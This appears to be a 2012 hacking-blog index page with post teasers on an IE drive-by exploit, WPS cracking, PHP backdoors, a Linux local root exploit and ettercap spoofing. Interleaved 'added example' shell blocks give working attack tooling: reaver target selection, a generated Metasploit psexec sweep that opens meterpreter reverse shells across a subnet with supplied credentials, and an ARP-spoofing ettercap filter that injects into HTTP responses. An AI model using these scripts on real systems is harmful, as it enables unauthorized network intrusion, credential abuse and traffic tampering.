January 27, 2012

MS12-004: midiOutPlayNextPolyEvent Heap Overflow

by - 135 views | Filed under: Buffer overflow, exploit and bug - 27 Jan 2012

The first web-based (drive-by) exploit of 2012. Target systems: IE6, IE7 and IE8 on Windows XP SP3; CVE-2012-0003.

Exploit :  http://www.dis9.com/code/CVE-2012-0003.html

(more…)

Scan WPS AP With Reaver

by - 41 views | Filed under: wireless hacker - 27 Jan 2012

Thanks to my apprentice Ps7isy for the submission.

The procedure for breaking the PIN authentication of WPS-enabled wireless routers is well documented, and we have covered it here before. The attack itself is simple; the problem is identifying which Wi-Fi networks actually have WPS enabled. Testing them one by one is slow and ineffective, so the task calls for automation. Below is a brief guide on how to make it painless.

(more…)
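As an added example (not part of the original post or of the reaver suite), the selection step that the guide above is about: take a scan listing in the shape that wash (reaver's WPS scanner) prints, keep only access points that report WPS as not locked and are close enough to be worth attacking, and emit one reaver command line per target. The listing embedded below is constructed; the column order (BSSID, channel, RSSI, WPS version, WPS locked, ESSID) and the interface name mon0 are assumptions about your wash version and airmon-ng setup, so check them against real output before trusting the filter.

```shell
#!/bin/sh
# Added example, not from the original post. Picks reaver targets out of a
# wash(1)-style scan listing.

# Constructed sample in the layout wash printed in 2012 (assumption):
# BSSID, channel, RSSI, WPS version, WPS locked, ESSID.
SAMPLE_WASH='BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
-----------------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -45        1.0               No                HomeNet
66:77:88:99:AA:BB      11            -70        1.0               Yes               Office
CC:DD:EE:FF:00:11       1            -52        1.0               No                Cafe
12:34:56:78:9A:BC       6            -88        1.0               No                Weak'

# wps_targets [MIN_RSSI]: read a wash-style listing on stdin and print
# "bssid channel essid" for every AP whose WPS Locked column is "No" and
# whose RSSI is at least MIN_RSSI (default -80 dBm; on a weaker link the
# PIN attempts mostly time out). The two header lines are skipped.
wps_targets() {
    awk -v min="${1:--80}" \
        'NR > 2 && $5 == "No" && $3 + 0 >= min { print $1, $2, $6 }'
}

# reaver_cmds IFACE: one reaver invocation per target line read on stdin.
# -i interface, -b target BSSID, -c channel, -vv verbose (real flags).
reaver_cmds() {
    iface="${1:-mon0}"
    while read -r bssid chan essid; do
        printf 'reaver -i %s -b %s -c %s -vv   # %s\n' \
            "$iface" "$bssid" "$chan" "$essid"
    done
}

# count_targets: how many usable APs the sample listing yields.
count_targets() {
    printf '%s\n' "$SAMPLE_WASH" | wps_targets | wc -l | tr -d ' '
}

# Live use: let wash run for a minute, stop it, then feed the capture in.
#   airmon-ng start wlan0
#   wash -i mon0 > scan.txt      # Ctrl-C when enough APs are listed
#   wps_targets < scan.txt | reaver_cmds mon0
```

The RSSI threshold is the part worth tuning: reaver needs many round trips per PIN half, so a distant AP that shows up as "WPS enabled" is often not a practical target even though it passes the locked check.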

January 25, 2012

Tool of the week : unix-privesc-check

by - 114 views | Filed under: linux server, Tools - 25 Jan 2012

Tool description as it appears on the author's website:

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files).

Get it here:

http://115.com/file/c2bhal4l
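To show the kind of misconfiguration the description above talks about, here is an added example (my own code, not part of unix-privesc-check): three of the checks a script of this type performs, written as functions that take a directory, a PATH string or a crontab file so they can be pointed at any tree. The checks are permission-bit based rather than `test -w` based so that they report the same thing whether you run them as a user or as root; the trade-off is that they miss files that are writable only through group membership or ACLs.

```shell
#!/bin/sh
# Added example, not part of unix-privesc-check: a few local-privesc
# misconfiguration checks in the same spirit.

# world_writable ROOT: regular files under ROOT that anyone may modify.
# A world-writable script or config that root later reads or executes is a
# direct escalation path.
world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null
}

# setuid_files ROOT: setuid or setgid executables under ROOT. Each one is
# code that runs with another user's privileges and deserves a look.
setuid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# writable_path_dirs PATHSTRING: directories in a PATH-style string that
# the current user can write to. If root's PATH (or a cron job's) lists such
# a directory, a planted binary with a common name runs as root.
writable_path_dirs() {
    old_ifs=$IFS
    IFS=:
    for d in $1; do
        [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    IFS=$old_ifs
    return 0
}

# cron_writable_cmds CRONTAB: commands from a crontab-style file whose
# executable is world-writable. Comments and blank lines are skipped; the
# first absolute path after the five schedule fields is taken as the
# command (this skips the user column of a system crontab; @reboot-style
# shorthand entries are not handled).
cron_writable_cmds() {
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$1" |
    awk '{ for (i = 6; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }' |
    while read -r cmd; do
        [ -f "$cmd" ] && find "$cmd" -type f -perm -0002
    done
    return 0
}

# privesc_report ROOT PATHSTRING CRONTAB: run all three and label them.
privesc_report() {
    echo "== world-writable files under $1";   world_writable "$1"
    echo "== setuid/setgid files under $1";    setuid_files "$1"
    echo "== writable PATH directories";        writable_path_dirs "$2"
    echo "== cron commands anyone can modify";  cron_writable_cmds "$3"
}

# Typical call on a live box (root sees more, as the tool description says):
#   privesc_report / "$PATH" /etc/crontab
```

Run it once as an ordinary user and once as root: the root run reads crontabs and directories the user run cannot, which is exactly why the original tool recommends the same.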

So, I set up a Discuz forum

by - 233 views | Filed under: daily headache (每日一疼) - 25 Jan 2012

Update: the server renewal became a financial burden (the sponsor's disdain), so I was forced to shut it down.
I shamelessly deleted the "Powered by Discuz!" from its template =。= Don't know why, but seeing that really annoys me....

OK, this is a forum focused on Linux security. The purpose of this post is just to ask whether anyone is interested. This small site will rarely be updated from now on.

http://www.dis9.com/linux/index.php Purpose: mainly to build a discussion community, where the difficulties you run into while learning (RFID, BT, wireless, Tools, web servers, server maintenance, other Linux distributions) can be posted in the forum's Q&A board to get answers.

January 24, 2012

PHP Stealth Backdoors

by - 276 views | Filed under: code, Tips - 24 Jan 2012

How do you hide your PHP backdoor? Earlier, BRK introduced two ways to hide a PHP backdoor, With Htaccess and The HookWorm. Readers seemed to like those, judging by the many comments.

Today I will introduce three more ways to hide a PHP backdoor, though none of them works as well as the ones the big-shot hacker Brk 炊少 presented (The HookWorm).

If you have a better method and want to share it, please leave a comment.

(more…)

CVE-2012-0056 – Mempodipper, a linux local root exploit.

by - 326 views | Filed under: exploit and bug - 24 Jan 2012

code  : http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html

// Does anyone have test code for 2.6.32-27-generic Ubuntu? CVE-2011-1020

#!/bin/bash
# CVE-2011-1020 check: the subshell opens /proc/$$/oom_adj before the shell
# execs into the setuid passwd binary, then writes to it three seconds later.
(sleep 3; echo 15) > /proc/$$/oom_adj &
exec /usr/bin/passwd

Output:

Read 69 bytes:
7 0xffffffff 0xbff646ac 0x0 0x0 0xf4d 0xbff646c8 0xbff64654 0x64b422
Changing password for test.
(current) UNIX password: Read 69 bytes:
3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422
Read 69 bytes:
3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422

(more…)
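The kernel in the question above (2.6.32-27-generic) is older than the range Mempodipper targets: writes to /proc/<pid>/mem were only enabled upstream in 2.6.39, and the permission checks CVE-2012-0056 abuses were fixed in 3.2.2. As an added example (not from the original post or from the exploit), a first-pass check of whether a kernel version string falls in that upstream window. It is a heuristic only: stable series and distribution kernels received the fix as backports without changing their major version, so a hit means "go verify", not "vulnerable".

```shell
#!/bin/sh
# Added example, not from the original post: CVE-2012-0056 version window
# check. Upstream range is 2.6.39 <= version < 3.2.2 (fix shipped in 3.2.2;
# backports to stable and distro kernels are not reflected in the version).

# kver_num VERSION: "3.2.1-foo" -> 3002001, an integer that compares in
# the same order as the version. The distro suffix after the first
# non-digit/non-dot character is dropped.
kver_num() {
    printf '%s\n' "$1" | sed 's/[^0-9.].*//' |
        awk -F. '{ printf "%d\n", $1 * 1000000 + $2 * 1000 + $3 }'
}

# mempodipper_range VERSION: returns 0 (and says so) when VERSION is inside
# the upstream window, 1 otherwise.
mempodipper_range() {
    v=$(kver_num "$1")
    lo=$(kver_num 2.6.39)
    hi=$(kver_num 3.2.2)
    if [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]; then
        printf '%s: inside the CVE-2012-0056 upstream window (2.6.39 <= v < 3.2.2)\n' "$1"
        return 0
    fi
    printf '%s: outside the upstream window\n' "$1"
    return 1
}

# check_running_kernel: apply the check to the kernel this shell runs on.
check_running_kernel() {
    mempodipper_range "$(uname -r)"
}
```

For the Ubuntu kernel in the question, the check says "outside the upstream window", which matches the fact that the box was being probed with the older CVE-2011-1020 /proc trick instead.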

January 21, 2012

A Note on Updating Weaponized Nokia N900s

by - 213 views | Filed under: nmap, wireless hacker - 21 Jan 2012

I wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s.

If you regularly update your Nokia N900 by doing (as root):

apt-get update && apt-get upgrade -y

I have run into some issues with some of the newer packages.

Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy to the point where it's almost unusable.

(more…)

January 20, 2012

Add a backdoor via nc using BT5

by - 547 views | Filed under: metasploit, Tips - 20 Jan 2012

A small thing from g0tmilk's video that I want to share with everyone. A newbie article, gurus please don't flame!

PS: posting on dis9.com is getting more and more stressful. Amitabha, don't flame me~

This newbie has already obtained SYSTEM on a box through Zone 9's latest ping overflow. Let's install nc so the next DIR overflow goes smoothly, yep!
(more…)

January 19, 2012

Metasploit PSEXEC scanner (via Perl)

by - 144 views | Filed under: code, metasploit - 19 Jan 2012

This module is similar to the psexec_scanner.rb written by carlos_perez; you can click here to view it.

The Perl script introduced here, written by spl0it, also scans an entire network range.
(more…)
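What both scanners mentioned above do under the hood is drive exploit/windows/smb/psexec across a range of hosts with one set of credentials, sharing a single payload handler. As an added example (my own code, not the Perl script or psexec_scanner.rb), here is that sweep expressed as a generated msfconsole resource script: a CIDR is expanded to host addresses in plain sh, one handler is started with ExitOnSession false, and psexec is then run per host with DisablePayloadHandler set so the runs do not fight over the listening port. Option names (RHOST rather than the later RHOSTS, SMBUser, SMBPass, SMBDomain) follow the module as it was in the 2012 framework; the addresses and credentials below are placeholders.

```shell
#!/bin/sh
# Added example, not the Perl script from the post: generate a Metasploit
# resource script that runs psexec against every host in a CIDR.

# ip2int a.b.c.d -> 32-bit integer (octets must not carry leading zeros,
# which sh arithmetic would read as octal).
ip2int() {
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int2ip INT -> a.b.c.d
int2ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# expand_cidr A.B.C.D/N: usable host addresses, one per line. Network and
# broadcast are dropped for prefixes shorter than /31; a bare address is /32.
expand_cidr() {
    ip=${1%/*}
    bits=${1#*/}
    [ "$ip" = "$bits" ] && bits=32
    base=$(ip2int "$ip")
    size=$(( 1 << (32 - bits) ))
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    net=$(( base & mask ))
    if [ "$bits" -ge 31 ]; then
        first=$net; last=$(( net + size - 1 ))
    else
        first=$(( net + 1 )); last=$(( net + size - 2 ))
    fi
    i=$first
    while [ "$i" -le "$last" ]; do
        int2ip "$i"
        i=$(( i + 1 ))
    done
}

# psexec_resource CIDR USER PASS LHOST [DOMAIN]: resource script text.
# One multi/handler stays up for every session; each psexec run reuses it.
# SMBPass may also be an LM:NTLM hash pair (pass-the-hash), as the module allows.
psexec_resource() {
    cidr=$1; user=$2; pass=$3; lhost=$4; domain=${5:-WORKGROUP}
cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
set ExitOnSession false
exploit -j -z
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
set DisablePayloadHandler true
set SMBDomain $domain
set SMBUser $user
set SMBPass $pass
EOF
    expand_cidr "$cidr" | while read -r host; do
        printf 'set RHOST %s\nexploit -j -z\n' "$host"
    done
}

# Usage (placeholder values):
#   psexec_resource 192.168.1.0/24 administrator 'Passw0rd' 192.168.1.9 CORP > sweep.rc
#   msfconsole -r sweep.rc
```

Generating a resource file rather than scripting msfconsole directly keeps the sweep reviewable before it runs: you can read exactly which hosts will be touched and with which account, which matters on an engagement with a scoped target list.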

A tutorial on the powerful sniffing tool ettercap: my spoofing rules

by - 231 views | Filed under: Penetration test - 19 Jan 2012

ettercap is a powerful spoofing tool for Linux (it runs on Windows too). It lets you build and send forged packets at great speed, at every level from the network adapter up to the application. It can bind a listener to a local port: connect a client to that port and it can decode unknown protocols or inject data into them (injection only works in ARP-based mode).
Below, let's talk about how to inject that data.
First you need your own rules. ettercap ships with a few by default:

brk@Dis9Team:/usr/share/ettercap$ ls
ettercap.png  etterfilter.cnt        etterfilter.tbl   etter.mime
etter.dns     etter.filter.examples  etter.finger.mac  etter.services
etter.fields  etter.filter.kill      etter.finger.os   etter.ssl.crt
etter.filter  etter.filter.ssh       etterlog.dtd
brk@Dis9Team:/usr/share/ettercap$

(more…)
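The files listed above are the stock rule sources; etter.filter.examples shows the filter language. As an added example (my own, not the author's rules from the rest of the post), here is a complete rule of the kind the post is heading for, together with the compile step and the ettercap command that applies it during an ARP spoof. The rule rewrites HTTP in flight: the request side blanks the Accept-Encoding header so the server answers uncompressed (an injection into a gzip body is useless), and the response side inserts a marker before </body>. Interface and host addresses are placeholders, and the `/host/` target syntax is the ettercap 0.7 form used in 2012 (0.8 changed it to `/host//port`).

```shell
#!/bin/sh
# Added example, not from the original post: an etterfilter rule that
# injects into HTTP responses, plus the commands to compile and apply it.

# write_filter FILE: write the rule source. The replacement for
# Accept-Encoding is the same length as the original so the request header
# block keeps its size; the response replacement may grow, which ettercap
# compensates for by adjusting TCP sequence numbers.
write_filter() {
cat > "$1" <<'EOF'
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("stripped Accept-Encoding\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "</body>")) {
        replace("</body>", "<!-- injected by filter --></body>");
        msg("injected into response\n");
    }
}
EOF
}

# filter_build SRC OUT: compile the rule with etterfilter from the suite.
filter_build() {
    etterfilter "$1" -o "$2"
}

# mitm_cmd IFACE FILTER TARGET GATEWAY: the ettercap invocation. -T text
# interface, -q quiet, -F compiled filter, -M arp:remote so traffic between
# TARGET and GATEWAY in both directions passes through this host.
mitm_cmd() {
    printf 'ettercap -T -q -i %s -F %s -M arp:remote /%s/ /%s/\n' "$1" "$2" "$3" "$4"
}

# Typical run (placeholder addresses):
#   write_filter inject.filter
#   filter_build inject.filter inject.ef
#   $(mitm_cmd eth0 inject.ef 192.168.1.5 192.168.1.1)
```

Keep the msg() calls while developing: they are the only feedback that a rule matched, and a filter that silently never fires usually means the traffic was compressed, on another port, or already past the TCP segment the search looked at.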